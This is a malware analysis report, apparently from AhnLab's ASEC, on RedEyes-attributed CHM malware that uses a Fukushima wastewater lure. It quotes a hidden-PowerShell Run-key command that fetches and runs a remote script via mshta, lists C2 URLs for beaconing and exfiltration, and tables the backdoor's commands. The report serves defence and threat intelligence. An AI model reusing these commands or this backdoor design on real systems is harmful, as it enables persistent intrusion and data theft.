The AhnLab Security Emergency response Center (ASEC) analysis team has recently discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group, is being distributed again. The CHM malware in distribution operates in a similar way to the “CHM Malware Disguised as Security Email from a Korean Financial Company” covered in March of this year and also uses the same commands used in the “2.3. Persistence” stage in the attack process of the RedEyes group’s M2RAT malware’.
The recent attack used information regarding the release of Fukushima wastewater. By using such a spotlight issue in Korea, the threat actor provokes the user’s curiosity and leads them to open the malicious file. Information about this issue can be seen in the help file window generated when the CHM malware is executed, as shown in Figure 1.
Figure 2 shows the malicious script that operates during this process. The mshta command used to be executed directly by the CHM file (hh.exe), but the recently distributed file registers the command to the RUN key enabling it to be run when the system reboots.
- RUN key registration
Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: fGZtm
Value: c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 126.96.36.199 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html
The decoded PowerShell command is a backdoor responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results. It receives commands from the threat actor’s server, and according to the commands, can perform various malicious behaviors such as uploading/downloading files, transmitting information on specific files, and editing the registry.
- hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[Computer name]-[User name] // Receive the threat actor’s command
- hxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 encoding] // Transmit the command execution results
|fileinfo||Saves the list of files and their properties (name, size, last modified time) in a certain path as CSV, transmits this file to the C2 server, then deletes it from the local system|
|dir||Compresses folders in a certain path, transmits them to the C2 server, then deletes them from the local system|
|file||Sends (uploads) a certain file to the C2 server|
|down||Downloads files in a certain path|
|regedit||Edits the registry|
|task||Adds a task to the Task Scheduler to be repetitively run at 10-minute intervals|
|zip||Decompresses a compressed file in a certain path|
|rename||Changes the name of a certain file|
|del||Delete files in a certain path|
When a system is infected with this type of malware, the system can suffer great damage since this malware is capable of performing various malicious acts such as downloading additional files and breaching data according to the threat actor’s commands. In particular, malware that targets users in Korea may include information on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.